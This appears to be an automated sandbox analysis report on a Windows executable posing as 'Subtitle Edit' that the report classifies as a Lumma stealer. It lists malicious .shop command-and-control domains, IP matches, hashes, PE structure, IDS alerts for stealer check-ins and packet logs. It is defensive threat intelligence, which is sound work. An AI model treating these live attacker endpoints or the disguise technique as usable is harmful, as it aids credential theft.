        https://traineiwnqo.shop/apitrue
        • Avira URL Cloud: malware
        unknown
        https://separateedmsqj.shop/apitrue
        • Avira URL Cloud: malware
        unknown
        NameSourceMaliciousAntivirus DetectionReputation
        http://www.opengis.net/gml0Subtitle Edit.exe, 00000000.00000002.2282605862.0000000002886000.00000004.00001000.00020000.00000000.sdmpfalse
        • Avira URL Cloud: safe
        unknown
        http://www.collada.org/2005/11/COLLADASchema0Subtitle Edit.exefalse
        • Avira URL Cloud: safe
        unknown
        https://locatedblsoqp.shop/BitLockerToGo.exe, 00000002.00000003.2301570044.0000000002883000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2308315335.0000000002883000.00000004.00000020.00020000.00000000.sdmpfalse
        • Avira URL Cloud: phishing
        unknown
        http://www.topografix.com/GPX/1/10Subtitle Edit.exe, 00000000.00000002.2282605862.0000000002886000.00000004.00001000.00020000.00000000.sdmpfalse
        • Avira URL Cloud: safe
        unknown
        https://locatedblsoqp.shop/0zBitLockerToGo.exe, 00000002.00000003.2301570044.0000000002883000.00000004.00000020.00020000.00000000.sdmpfalse
        • Avira URL Cloud: phishing
        unknown
        http://earth.google.com/kml/2.20Subtitle Edit.exe, 00000000.00000002.2282605862.0000000002886000.00000004.00001000.00020000.00000000.sdmpfalse
        • Avira URL Cloud: safe
        unknown
        http://earth.google.com/kml/2.00Subtitle Edit.exe, 00000000.00000002.2282605862.0000000002886000.00000004.00001000.00020000.00000000.sdmpfalse
        • Avira URL Cloud: safe
        unknown
        http://earth.google.com/kml/2.10Subtitle Edit.exe, 00000000.00000002.2282605862.0000000002886000.00000004.00001000.00020000.00000000.sdmpfalse
        • Avira URL Cloud: safe
        unknown
        http://www.opengis.net/gml/3.20Subtitle Edit.exe, 00000000.00000002.2282605862.0000000002886000.00000004.00001000.00020000.00000000.sdmpfalse
        • Avira URL Cloud: safe
        unknown
        http://www.garmin.com/xmlschemas/TrainingCenterDatabase/v20Subtitle Edit.exe, 00000000.00000002.2282605862.00000000028F4000.00000004.00001000.00020000.00000000.sdmpfalse
        • Avira URL Cloud: safe
        unknown
        https://traineiwnqo.shop/8BitLockerToGo.exe, 00000002.00000003.2308315335.0000000002883000.00000004.00000020.00020000.00000000.sdmpfalse
        • Avira URL Cloud: malware
        unknown
        http://www.opengis.net/kml/2.20Subtitle Edit.exe, 00000000.00000002.2282605862.0000000002886000.00000004.00001000.00020000.00000000.sdmpfalse
        • Avira URL Cloud: safe
        unknown
        http://www.opengis.net/gml/3.3/exr0Subtitle Edit.exe, 00000000.00000002.2282605862.0000000002886000.00000004.00001000.00020000.00000000.sdmpfalse
        • Avira URL Cloud: safe
        unknown
        https://www.cloudflare.com/learning/ddos/glossary/malware/BitLockerToGo.exe, 00000002.00000003.2308315335.000000000287F000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2308293210.00000000028D8000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2308315335.0000000002883000.00000004.00000020.00020000.00000000.sdmpfalse
        • Avira URL Cloud: safe
        unknown
        https://locatedblsoqp.shop/WBitLockerToGo.exe, 00000002.00000003.2301570044.0000000002883000.00000004.00000020.00020000.00000000.sdmpfalse
        • Avira URL Cloud: phishing
        unknown
        https://login.microsoftonline.us/crypto/aes:0Subtitle Edit.exefalse
        • Avira URL Cloud: safe
        unknown
        https://traineiwnqo.shop/BitLockerToGo.exe, 00000002.00000002.2319746932.0000000002883000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2308315335.0000000002883000.00000004.00000020.00020000.00000000.sdmpfalse
        • Avira URL Cloud: malware
        unknown
        https://separateedmsqj.shop/x86BitLockerToGo.exe, 00000002.00000002.2319746932.000000000285E000.00000004.00000020.00020000.00000000.sdmpfalse
        • Avira URL Cloud: safe
        unknown
        https://www.cloudflare.com/5xx-error-landingBitLockerToGo.exe, 00000002.00000003.2308315335.000000000287F000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000002.2319746932.000000000285E000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2308293210.00000000028D8000.00000004.00000020.00020000.00000000.sdmpfalse
        • Avira URL Cloud: safe
        unknown
        • No. of IPs < 25%
        • 25% < No. of IPs < 50%
        • 50% < No. of IPs < 75%
        • 75% < No. of IPs
        IPDomainCountryFlagASNASN NameMalicious
        188.114.96.3
        separateedmsqj.shopEuropean Union
        13335CLOUDFLARENETUStrue
        Joe Sandbox version:40.0.0 Tourmaline
        Analysis ID:1501216
        Start date and time:2024-08-29 15:39:11 +02:00
        Joe Sandbox product:CloudBasic
        Overall analysis duration:0h 5m 43s
        Hypervisor based Inspection enabled:false
        Report type:full
        Cookbook file name:default.jbs
        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
        Number of analysed new started processes analysed:6
        Number of new started drivers analysed:0
        Number of existing processes analysed:0
        Number of existing drivers analysed:0
        Number of injected processes analysed:0
        Technologies:
        • HCA enabled
        • EGA enabled
        • AMSI enabled
        Analysis Mode:default
        Analysis stop reason:Timeout
        Sample name:0Subtitle Edit.exe
        Detection:MAL
        Classification:mal92.evad.winEXE@3/0@3/1
        EGA Information:
        • Successful, ratio: 50%
        HCA Information:
        • Successful, ratio: 88%
        • Number of executed functions: 12
        • Number of non-executed functions: 70
        Cookbook Comments:
        • Found application associated with file extension: .exe
        • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
        • Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
        • Execution Graph export aborted for target 0Subtitle Edit.exe, PID 6732 because there are no executed function
        • Report size getting too big, too many NtQueryValueKey calls found.
        • VT rate limit hit for: 0Subtitle Edit.exe
        TimeTypeDescription
        09:40:21API Interceptor2x Sleep call for process: BitLockerToGo.exe modified
        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
        188.114.96.3Fordybendes.exeGet hashmaliciousAzorult, GuLoaderBrowse
        • d4hk.shop/DL341/index.php
        ORDER_38746_pdf.exeGet hashmaliciousFormBookBrowse
        • www.begumnasreenbano.com/e8by/
        QUOTATION_AUGQTRA071244#U00b7PDF.scrGet hashmaliciousUnknownBrowse
        • filetransfer.io/data-package/zbi9vNYx/download
        QUOTATION_AUGQTRA071244PDF.scr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
        • filetransfer.io/data-package/kDY6Kvx6/download
        PO_GM_list_28082024202003180817418280824_purchase_doc_00000(991KB).batGet hashmaliciousFormBook, GuLoader, RemcosBrowse
        • www.katasoo.com/7qad/
        709876765465.exeGet hashmaliciousDBatLoader, FormBookBrowse
        • www.coinwab.com/kqqj/
        http://allegro-8888.com/Get hashmaliciousUnknownBrowse
        • allegro-8888.com/xml/index.html
        PO_112234525626823775.jsGet hashmaliciousLokibotBrowse
        • werdotx.shop/Devil/PWS/fre.php
        nOyswc9ly2.dllGet hashmaliciousUnknownBrowse
        • web.ad87h92j.com/4/t.bmp
        pXm5oVO3Go.exeGet hashmaliciousNitolBrowse
        • web.ad87h92j.com/4/t.bmp
        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
        traineiwnqo.shopfile.exeGet hashmaliciousLummaCBrowse
        • 188.114.96.3
        Setup.exeGet hashmaliciousLummaCBrowse
        • 188.114.97.3
        Setup.exeGet hashmaliciousLummaCBrowse
        • 188.114.97.3
        Setup.exeGet hashmaliciousLummaCBrowse
        • 188.114.96.3
        Setup.exeGet hashmaliciousLummaCBrowse
        • 188.114.96.3
        iBO7gzlZr3.exeGet hashmaliciousLummaCBrowse
        • 188.114.97.3
        PDF To Excel Converter.exeGet hashmaliciousLummaC, MicroClipBrowse
        • 188.114.97.3
        Setup.exeGet hashmaliciousLummaCBrowse
        • 188.114.97.3
        Setup.exeGet hashmaliciousLummaCBrowse
        • 188.114.96.3
        Setup-Pro.exeGet hashmaliciousLummaCBrowse
        • 188.114.97.3
        locatedblsoqp.shopfile.exeGet hashmaliciousLummaCBrowse
        • 188.114.96.3
        Setup.exeGet hashmaliciousLummaCBrowse
        • 188.114.97.3
        Setup.exeGet hashmaliciousLummaCBrowse
        • 188.114.96.3
        Setup.exeGet hashmaliciousLummaCBrowse
        • 188.114.97.3
        Setup.exeGet hashmaliciousLummaCBrowse
        • 188.114.97.3
        iBO7gzlZr3.exeGet hashmaliciousLummaCBrowse
        • 188.114.97.3
        PDF To Excel Converter.exeGet hashmaliciousLummaC, MicroClipBrowse
        • 188.114.96.3
        Setup.exeGet hashmaliciousLummaCBrowse
        • 188.114.96.3
        Setup.exeGet hashmaliciousLummaCBrowse
        • 188.114.96.3
        Setup-Pro.exeGet hashmaliciousLummaCBrowse
        • 188.114.96.3
        separateedmsqj.shop0csp_console.exeGet hashmaliciousLummaCBrowse
        • 188.114.96.3
        bot-check3.b-cdn.net.ps1Get hashmaliciousLummaCBrowse
        • 188.114.96.3
        bot-check1.b-cdn.net.ps1Get hashmaliciousLummaCBrowse
        • 188.114.96.3
        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
        CLOUDFLARENETUShttps://gocloud.co.ke/ShareDocu.php/?email=cmFjaGVsakBjb21wbHl3b3Jrcy5jb20=Get hashmaliciousCaptcha Phish, HTMLPhisherBrowse
        • 188.114.96.3
        https://piclut.com/n/?c3Y9bzM2NV8xX29uZSZyYW5kPWNrcHVSM2s9JnVpZD1VU0VSMjkwNzIwMjRVMTgwNzI5MDA=Get hashmaliciousUnknownBrowse
        • 104.21.92.125
        file.exeGet hashmaliciousUnknownBrowse
        • 172.64.41.3
        file.exeGet hashmaliciousUnknownBrowse
        • 172.64.41.3
        http://control.frilix.com/grace/fxc/aW5mby5jcmVkaXRldXJlbkBicmVkYS5ubA==Get hashmaliciousHTMLPhisherBrowse
        • 104.18.95.41
        https://tmx.velsol.com/Reporting/Document.aspx?MasterAgreementID=i1339-005394573&ID=aQAxADMAMwA5AC0AMAAwADUAMwA5ADQANQA3ADMA.Get hashmaliciousUnknownBrowse
        • 104.17.24.14
        file.exeGet hashmaliciousLummaCBrowse
        • 188.114.96.3
        https://tmx.velsol.com/Reporting/Document.aspx?MasterAgreementID=i1339-005394573&ID=aQAxADMAMwA5AC0AMAAwADUAMwA5ADQANQA3ADMA.Get hashmaliciousUnknownBrowse
        • 104.17.24.14
        https://sesh-gangrene.shop/Get hashmaliciousHTMLPhisherBrowse
        • 104.18.95.41
        http://www.bambooalgarve.comGet hashmaliciousUnknownBrowse
        • 104.17.25.14
        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
        a0e9f5d64349fb13191bc781f81f42e1file.exeGet hashmaliciousLummaCBrowse
        • 188.114.96.3
        Setup.exeGet hashmaliciousLummaCBrowse
        • 188.114.96.3
        Setup.exeGet hashmaliciousLummaCBrowse
        • 188.114.96.3
        Setup.exeGet hashmaliciousLummaCBrowse
        • 188.114.96.3
        Setup.exeGet hashmaliciousLummaCBrowse
        • 188.114.96.3
        Setup-Premium.exeGet hashmaliciousLummaCBrowse
        • 188.114.96.3
        Setup-Premium.exeGet hashmaliciousLummaCBrowse
        • 188.114.96.3
        iBO7gzlZr3.exeGet hashmaliciousLummaCBrowse
        • 188.114.96.3
        d3d9x.dllGet hashmaliciousLummaCBrowse
        • 188.114.96.3
        Scanned Document.exeGet hashmaliciousDBatLoader, FormBookBrowse
        • 188.114.96.3
        No context
        No created / dropped files found
        File type:PE32 executable (GUI) Intel 80386, for MS Windows
        Entropy (8bit):5.977148795110524
        TrID:
        • Win32 Executable (generic) a (10002005/4) 99.53%
        • InstallShield setup (43055/19) 0.43%
        • Generic Win/DOS Executable (2004/3) 0.02%
        • DOS Executable Generic (2002/1) 0.02%
        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
        File name:0Subtitle Edit.exe
        File size:18'028'032 bytes
        MD5:c304e6d97f3a59f101484c104132c434
        SHA1:02eefa0d5e5578406c37d9088be34c844349df01
        SHA256:2380b9a91c92ba2ab097f7237294d9235970ea3054bd16c7b5aabcbec9c44322
        SHA512:14c239ecf12941dcef6f0ab7e955c942061310dd38b3979fc98a6f76c23c81014d337970c8b4d0ed062fb869fabbf55555a39a8506e66de78502d1b1c41f9394
        SSDEEP:98304:apXjB+jkboS06BrHkB1IuCg8CgEkUa9VCzk1K4Yjghio6cWE79DTHA5UiuHRClbm:WQyI3INCgzVCNUhp79o2RClbvO
        TLSH:14072851FE9B44F5D9438871845BB27F13348D058B29CB8BEB45BA2AF8377915C3B20A
        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L........*...............Py..^.......r............@.................................:.....@................................
        Icon Hash:0c0c2d33ceec80aa
        Entrypoint:0x4772f0
        Entrypoint Section:.text
        Digitally signed:false
        Imagebase:0x400000
        Subsystem:windows gui
        Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
        DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
        Time Stamp:0x0 [Thu Jan 1 00:00:00 1970 UTC]
        TLS Callbacks:
        CLR (.Net) Version:
        OS Version Major:6
        OS Version Minor:1
        File Version Major:6
        File Version Minor:1
        Subsystem Version Major:6
        Subsystem Version Minor:1
        Import Hash:1aae8bf580c846f39c71c05898e57e88
        Instruction
        jmp 00007F52C907B490h
        int3
        int3
        int3
        int3
        int3
        int3
        int3
        int3
        int3
        int3
        int3
        sub esp, 28h
        mov dword ptr [esp+1Ch], ebx
        mov dword ptr [esp+10h], ebp
        mov dword ptr [esp+14h], esi
        mov dword ptr [esp+18h], edi
        mov dword ptr [esp], eax
        mov dword ptr [esp+04h], ecx
        call 00007F52C9056696h
        mov eax, dword ptr [esp+08h]
        mov edi, dword ptr [esp+18h]
        mov esi, dword ptr [esp+14h]
        mov ebp, dword ptr [esp+10h]
        mov ebx, dword ptr [esp+1Ch]
        add esp, 28h
        retn 0004h
        ret
        int3
        int3
        int3
        int3
        int3
        int3
        sub esp, 08h
        mov ecx, dword ptr [esp+0Ch]
        mov edx, dword ptr [ecx]
        mov eax, esp
        mov dword ptr [edx+04h], eax
        sub eax, 00010000h
        mov dword ptr [edx], eax
        add eax, 00000BA0h
        mov dword ptr [edx+08h], eax
        mov dword ptr [edx+0Ch], eax
        lea edi, dword ptr [ecx+34h]
        mov dword ptr [edx+18h], ecx
        mov dword ptr [edi], edx
        mov dword ptr [esp+04h], edi
        call 00007F52C907D904h
        cld
        call 00007F52C907C97Eh
        call 00007F52C907B5B9h
        add esp, 08h
        ret
        jmp 00007F52C907D7B0h
        int3
        int3
        int3
        int3
        int3
        int3
        int3
        int3
        int3
        int3
        int3
        mov ebx, dword ptr [esp+04h]
        mov ebp, esp
        mov dword ptr fs:[00000034h], 00000000h
        mov ecx, dword ptr [ebx+04h]
        cmp ecx, 00000000h
        je 00007F52C907D7B1h
        mov eax, ecx
        shl eax, 02h
        sub esp, eax
        mov edi, esp
        mov esi, dword ptr [ebx+08h]
        cld
        rep movsd
        NameVirtual AddressVirtual Size Is in Section
        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
        IMAGE_DIRECTORY_ENTRY_IMPORT0x10ef0000x44c.idata
        IMAGE_DIRECTORY_ENTRY_RESOURCE0x115d0000xe8f4.rsrc
        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
        IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
        IMAGE_DIRECTORY_ENTRY_BASERELOC0x10f00000x6bb08.reloc
        IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
        IMAGE_DIRECTORY_ENTRY_TLS0x00x0
        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
        IMAGE_DIRECTORY_ENTRY_IAT0x1041ae00xb4.data
        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
        NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
        .text0x10000x794e280x7950007abb70141b8ce382098157ee1cba1978unknownunknownunknownunknownIMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
        .rdata0x7960000x8a9ea40x8aa000fef4fdeca42d4488434e0dcf81162eb7unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
        .data0x10400000xaedac0x774009143fdee4fe14c54c687842bb1e8ea17False0.344851447851153data5.4176502281358605IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
        .idata0x10ef0000x44c0x600ea090bf510810cfc73e0f1331dd2cabeFalse0.3606770833333333OpenPGP Public Key4.033296473966784IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
        .reloc0x10f00000x6bb080x6bc00803d89346d3923b33030cf935c41faf3False0.5555485063805105data6.662437121700121IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
        .symtab0x115c0000x40x20007b5472d347d42780469fb2654b7fc54False0.02734375data0.020393135236084953IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
        .rsrc0x115d0000xe8f40xea000f180081ea106a63d468c6a161416d74False0.16528111645299146data3.5046136969334065IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
        NameRVASizeTypeLanguageCountryZLIB Complexity
        RT_ICON0x115d3840xa68Device independent bitmap graphic, 64 x 128 x 4, image size 2048EnglishUnited States0.1174924924924925
        RT_ICON0x115ddec0x668Device independent bitmap graphic, 48 x 96 x 4, image size 1152EnglishUnited States0.15792682926829268
        RT_ICON0x115e4540x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 512EnglishUnited States0.23387096774193547
        RT_ICON0x115e73c0x128Device independent bitmap graphic, 16 x 32 x 4, image size 128EnglishUnited States0.39864864864864863
        RT_ICON0x115e8640x1628Device independent bitmap graphic, 64 x 128 x 8, image size 4096, 256 important colorsEnglishUnited States0.08339210155148095
        RT_ICON0x115fe8c0xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colorsEnglishUnited States0.1023454157782516
        RT_ICON0x1160d340x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colorsEnglishUnited States0.10649819494584838
        RT_ICON0x11615dc0x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colorsEnglishUnited States0.10838150289017341
        RT_ICON0x1161b440x12e5PNG image data, 256 x 256, 8-bit/color RGBA, non-interlacedEnglishUnited States0.8712011577424024
        RT_ICON0x1162e2c0x4228Device independent bitmap graphic, 64 x 128 x 32, image size 16896EnglishUnited States0.05668398677373642
        RT_ICON0x11670540x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600EnglishUnited States0.08475103734439834
        RT_ICON0x11695fc0x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224EnglishUnited States0.09920262664165103
        RT_ICON0x116a6a40x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088EnglishUnited States0.2047872340425532
        RT_GROUP_ICON0x116ab0c0xbcdataEnglishUnited States0.6170212765957447
        RT_VERSION0x116abc80x584dataEnglishUnited States0.29178470254957506
        RT_MANIFEST0x116b14c0x7a8XML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States0.3377551020408163
        DLLImport
        kernel32.dllWriteFile, WriteConsoleW, WerSetFlags, WerGetFlags, WaitForMultipleObjects, WaitForSingleObject, VirtualQuery, VirtualFree, VirtualAlloc, TlsAlloc, SwitchToThread, SuspendThread, SetWaitableTimer, SetUnhandledExceptionFilter, SetProcessPriorityBoost, SetEvent, SetErrorMode, SetConsoleCtrlHandler, ResumeThread, RaiseFailFastException, PostQueuedCompletionStatus, LoadLibraryW, LoadLibraryExW, SetThreadContext, GetThreadContext, GetSystemInfo, GetSystemDirectoryA, GetStdHandle, GetQueuedCompletionStatusEx, GetProcessAffinityMask, GetProcAddress, GetErrorMode, GetEnvironmentStringsW, GetCurrentThreadId, GetConsoleMode, FreeEnvironmentStringsW, ExitProcess, DuplicateHandle, CreateWaitableTimerExW, CreateThread, CreateIoCompletionPort, CreateEventA, CloseHandle, AddVectoredExceptionHandler
        Language of compilation systemCountry where language is spokenMap
        EnglishUnited States
        TimestampProtocolSIDSignatureSeveritySource PortDest PortSource IPDest IP
        2024-08-29T15:40:23.745299+0200TCP2055493ET MALWARE Lumma Stealer Domain in TLS SNI (traineiwnqo .shop)149716443192.168.2.6188.114.96.3
        2024-08-29T15:40:23.086805+0200TCP2055493ET MALWARE Lumma Stealer Domain in TLS SNI (traineiwnqo .shop)149715443192.168.2.6188.114.96.3
        2024-08-29T15:40:22.581381+0200UDP2055483ET MALWARE Lumma Stealer Domain in DNS Lookup (traineiwnqo .shop)14920953192.168.2.61.1.1.1
        2024-08-29T15:40:23.232493+0200TCP2049836ET MALWARE Lumma Stealer Related Activity149715443192.168.2.6188.114.96.3
        2024-08-29T15:40:23.232493+0200TCP2054653ET MALWARE Lumma Stealer CnC Host Checkin149715443192.168.2.6188.114.96.3
        2024-08-29T15:40:24.347073+0200TCP2049812ET MALWARE Lumma Stealer Related Activity M2149716443192.168.2.6188.114.96.3
        2024-08-29T15:40:24.347073+0200TCP2054653ET MALWARE Lumma Stealer CnC Host Checkin149716443192.168.2.6188.114.96.3
        2024-08-29T15:40:22.112500+0200TCP2055489ET MALWARE Lumma Stealer Domain in TLS SNI (locatedblsoqp .shop)149714443192.168.2.6188.114.96.3
        2024-08-29T15:40:22.563426+0200TCP2049836ET MALWARE Lumma Stealer Related Activity149714443192.168.2.6188.114.96.3
        2024-08-29T15:40:22.563426+0200TCP2054653ET MALWARE Lumma Stealer CnC Host Checkin149714443192.168.2.6188.114.96.3
        2024-08-29T15:40:21.613730+0200UDP2055479ET MALWARE Lumma Stealer Domain in DNS Lookup (locatedblsoqp .shop)15009953192.168.2.61.1.1.1
        2024-08-29T15:40:21.491116+0200TCP2049836ET MALWARE Lumma Stealer Related Activity149713443192.168.2.6188.114.96.3
        2024-08-29T15:40:21.491116+0200TCP2054653ET MALWARE Lumma Stealer CnC Host Checkin149713443192.168.2.6188.114.96.3
        TimestampSource PortDest PortSource IPDest IP
        Aug 29, 2024 15:40:20.518735886 CEST49713443192.168.2.6188.114.96.3
        Aug 29, 2024 15:40:20.518781900 CEST44349713188.114.96.3192.168.2.6
        Aug 29, 2024 15:40:20.518855095 CEST49713443192.168.2.6188.114.96.3
        Aug 29, 2024 15:40:20.521859884 CEST49713443192.168.2.6188.114.96.3
        Aug 29, 2024 15:40:20.521873951 CEST44349713188.114.96.3192.168.2.6
        Aug 29, 2024 15:40:20.986238003 CEST44349713188.114.96.3192.168.2.6
        Aug 29, 2024 15:40:20.986397028 CEST49713443192.168.2.6188.114.96.3
        Aug 29, 2024 15:40:20.988801003 CEST49713443192.168.2.6188.114.96.3
        Aug 29, 2024 15:40:20.988809109 CEST44349713188.114.96.3192.168.2.6
        Aug 29, 2024 15:40:20.989064932 CEST44349713188.114.96.3192.168.2.6
        Aug 29, 2024 15:40:21.040318966 CEST49713443192.168.2.6188.114.96.3
        Aug 29, 2024 15:40:21.046236992 CEST49713443192.168.2.6188.114.96.3
        Aug 29, 2024 15:40:21.046252012 CEST49713443192.168.2.6188.114.96.3
        Aug 29, 2024 15:40:21.046330929 CEST44349713188.114.96.3192.168.2.6
        Aug 29, 2024 15:40:21.491127014 CEST44349713188.114.96.3192.168.2.6
        Aug 29, 2024 15:40:21.491224051 CEST44349713188.114.96.3192.168.2.6
        Aug 29, 2024 15:40:21.491286039 CEST49713443192.168.2.6188.114.96.3
        Aug 29, 2024 15:40:21.596427917 CEST49713443192.168.2.6188.114.96.3
        Aug 29, 2024 15:40:21.596445084 CEST44349713188.114.96.3192.168.2.6
        Aug 29, 2024 15:40:21.630716085 CEST49714443192.168.2.6188.114.96.3
        Aug 29, 2024 15:40:21.630738974 CEST44349714188.114.96.3192.168.2.6
        Aug 29, 2024 15:40:21.630800009 CEST49714443192.168.2.6188.114.96.3
        Aug 29, 2024 15:40:21.631314993 CEST49714443192.168.2.6188.114.96.3
        Aug 29, 2024 15:40:21.631326914 CEST44349714188.114.96.3192.168.2.6
        Aug 29, 2024 15:40:22.112369061 CEST44349714188.114.96.3192.168.2.6
        Aug 29, 2024 15:40:22.112499952 CEST49714443192.168.2.6188.114.96.3
        Aug 29, 2024 15:40:22.114232063 CEST49714443192.168.2.6188.114.96.3
        Aug 29, 2024 15:40:22.114242077 CEST44349714188.114.96.3192.168.2.6
        Aug 29, 2024 15:40:22.114475965 CEST44349714188.114.96.3192.168.2.6
        Aug 29, 2024 15:40:22.115976095 CEST49714443192.168.2.6188.114.96.3
        Aug 29, 2024 15:40:22.116008997 CEST49714443192.168.2.6188.114.96.3
        Aug 29, 2024 15:40:22.116049051 CEST44349714188.114.96.3192.168.2.6
        Aug 29, 2024 15:40:22.563436031 CEST44349714188.114.96.3192.168.2.6
        Aug 29, 2024 15:40:22.563541889 CEST44349714188.114.96.3192.168.2.6
        Aug 29, 2024 15:40:22.563585043 CEST49714443192.168.2.6188.114.96.3
        Aug 29, 2024 15:40:22.563781023 CEST49714443192.168.2.6188.114.96.3
        Aug 29, 2024 15:40:22.563802004 CEST44349714188.114.96.3192.168.2.6
        Aug 29, 2024 15:40:22.563813925 CEST49714443192.168.2.6188.114.96.3
        Aug 29, 2024 15:40:22.563818932 CEST44349714188.114.96.3192.168.2.6
        Aug 29, 2024 15:40:22.593842983 CEST49715443192.168.2.6188.114.96.3
        Aug 29, 2024 15:40:22.593884945 CEST44349715188.114.96.3192.168.2.6
        Aug 29, 2024 15:40:22.593965054 CEST49715443192.168.2.6188.114.96.3
        Aug 29, 2024 15:40:22.594377041 CEST49715443192.168.2.6188.114.96.3
        Aug 29, 2024 15:40:22.594387054 CEST44349715188.114.96.3192.168.2.6
        Aug 29, 2024 15:40:23.086747885 CEST44349715188.114.96.3192.168.2.6
        Aug 29, 2024 15:40:23.086805105 CEST49715443192.168.2.6188.114.96.3
        Aug 29, 2024 15:40:23.088407993 CEST49715443192.168.2.6188.114.96.3
        Aug 29, 2024 15:40:23.088418007 CEST44349715188.114.96.3192.168.2.6
        Aug 29, 2024 15:40:23.088666916 CEST44349715188.114.96.3192.168.2.6
        Aug 29, 2024 15:40:23.090204954 CEST49715443192.168.2.6188.114.96.3
        Aug 29, 2024 15:40:23.090220928 CEST49715443192.168.2.6188.114.96.3
        Aug 29, 2024 15:40:23.090267897 CEST44349715188.114.96.3192.168.2.6
        Aug 29, 2024 15:40:23.232522964 CEST44349715188.114.96.3192.168.2.6
        Aug 29, 2024 15:40:23.232574940 CEST44349715188.114.96.3192.168.2.6
        Aug 29, 2024 15:40:23.232614994 CEST44349715188.114.96.3192.168.2.6
        Aug 29, 2024 15:40:23.232639074 CEST49715443192.168.2.6188.114.96.3
        Aug 29, 2024 15:40:23.232656002 CEST44349715188.114.96.3192.168.2.6
        Aug 29, 2024 15:40:23.232736111 CEST44349715188.114.96.3192.168.2.6
        Aug 29, 2024 15:40:23.232805014 CEST49715443192.168.2.6188.114.96.3
        Aug 29, 2024 15:40:23.239969969 CEST49715443192.168.2.6188.114.96.3
        Aug 29, 2024 15:40:23.239991903 CEST44349715188.114.96.3192.168.2.6
        Aug 29, 2024 15:40:23.240041971 CEST49715443192.168.2.6188.114.96.3
        Aug 29, 2024 15:40:23.240048885 CEST44349715188.114.96.3192.168.2.6
        Aug 29, 2024 15:40:23.259490967 CEST49716443192.168.2.6188.114.96.3
        Aug 29, 2024 15:40:23.259521961 CEST44349716188.114.96.3192.168.2.6
        Aug 29, 2024 15:40:23.259594917 CEST49716443192.168.2.6188.114.96.3
        Aug 29, 2024 15:40:23.259865999 CEST49716443192.168.2.6188.114.96.3
        Aug 29, 2024 15:40:23.259876966 CEST44349716188.114.96.3192.168.2.6
        Aug 29, 2024 15:40:23.745207071 CEST44349716188.114.96.3192.168.2.6
        Aug 29, 2024 15:40:23.745299101 CEST49716443192.168.2.6188.114.96.3
        Aug 29, 2024 15:40:23.746922970 CEST49716443192.168.2.6188.114.96.3
        Aug 29, 2024 15:40:23.746932983 CEST44349716188.114.96.3192.168.2.6
        Aug 29, 2024 15:40:23.747168064 CEST44349716188.114.96.3192.168.2.6
        Aug 29, 2024 15:40:23.748358011 CEST49716443192.168.2.6188.114.96.3
        Aug 29, 2024 15:40:23.748502016 CEST49716443192.168.2.6188.114.96.3
        Aug 29, 2024 15:40:23.748521090 CEST44349716188.114.96.3192.168.2.6
        Aug 29, 2024 15:40:24.347090960 CEST44349716188.114.96.3192.168.2.6
        Aug 29, 2024 15:40:24.347189903 CEST44349716188.114.96.3192.168.2.6
        Aug 29, 2024 15:40:24.347469091 CEST49716443192.168.2.6188.114.96.3
        Aug 29, 2024 15:40:24.347506046 CEST49716443192.168.2.6188.114.96.3
        Aug 29, 2024 15:40:24.347521067 CEST44349716188.114.96.3192.168.2.6
